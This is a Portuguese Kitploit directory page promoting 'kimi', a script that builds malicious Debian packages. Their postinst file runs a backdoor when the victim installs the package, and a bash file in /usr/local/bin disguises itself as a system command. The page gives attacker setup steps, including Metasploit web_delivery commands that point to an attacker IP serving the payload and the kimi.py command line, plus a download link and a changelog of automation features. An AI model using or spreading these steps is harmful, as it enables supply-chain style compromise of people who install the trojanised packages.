Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
kimi — Script para gerar pacotes debian maliciosos (debain trojans). | Kitploit
Ferramentas/GitHubGitHub/chaitanyaharitash/kimi
Frameworks de ExploraçãoGeração de PayloadsPós-ExploraçãoAnálise de MalwareTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubchaitanyaharitash/kimi

kimi

Script para gerar pacotes debian maliciosos (debain trojans).

Ver Repositório
123546há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

kimi - Gerador de pacotes Debian maliciosos

Script para gerar pacotes Debian maliciosos (trojan debian).

Sobre & Pontos positivos & Uso & Testado em :::

root@kitploit:~
Kimi é um nome inspirado em "Kimimaro", um dos meus personagens favoritos do anime chamado "Naruto".

Kimi é um script que gera pacotes Debian maliciosos para o Metasploit, que consiste em um arquivo bash. O arquivo bash é implantado no diretório "/usr/local/bin/".

O backdoor é executado exatamente quando a vítima tenta instalar o pacote deb devido ao arquivo postinst.

O arquivo bash injeta e também funciona como algum comando do sistema que, quando executado pela vítima e o atacante atinge com a sessão.

Pontos positivos :
-- Totalmente independente. Significa que o usuário não precisa instalar nenhum criador de pacotes Debian.
-- Pode ser integrado facilmente com qualquer gerador de payload devido ao uso de argumentos (bobo :P eu sei).

Kimi basicamente depende do módulo web_delivery e tudo é automatizado. Tudo o que o atacante precisa fazer é as seguintes configurações :

Configurando Web_Delivery no msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Gerando payload malicioso :

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

NOTA :: Este projeto foi feito para ser integrado com o Venom Shellcode Generator 1.0.13.
Ele pode ser usado de forma independente também, tudo que o usuário precisa é alterar o uripath nas variáveis do msf.
-------------------------------------------------------------------------------------

Testado em :
            Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
            ParrotOS (Debian Jessie)
            Kali Rolling 2.0
Baixar ferramenta

Atualizações :::

root@kitploit:~
[Feb-22-2017]
-- Adicionada função de criação de arquivo "postinst" para automatizar a execução de arquivo malicioso incorporado.
-- Adicionada função de geração de arquivo RC para automatizar completamente com abertura de handler, ou seja, não é necessário configurar o handler manualmente.
-- Corrigidos alguns bugs comuns [agradecimento especial ao r00t 3xp10it :)]

[Oct-12-2017]
-- Adicionado argumento de linha de comando (-a/--arch) para selecionar arquitetura (i386/amd64)

[April-24-2019] - Test Release.
-- Agora URI e LPORT personalizados podem ser definidos.
-- O payload Python foi atualizado de acordo com Python 2/3 e também a versão mais recente do Metasploit 5.
-- Todo o código foi reimplementado, embora ainda suporte Python 2.7.

Capturas de tela :::

Main Banner Kimi In Action

Diversos :::

root@kitploit:~
   Post no blog     : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   Vídeo no YouTube : https://youtu.be/Dsn6BRHy9_w
   Amostra do Viruatotal (Porque vi uso desagradável deste script na natureza): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

Agradecimentos a :::

Suspicious Shell Activity [Red Team]

Dúvidas? Insultos?

Twitter : @bofheaded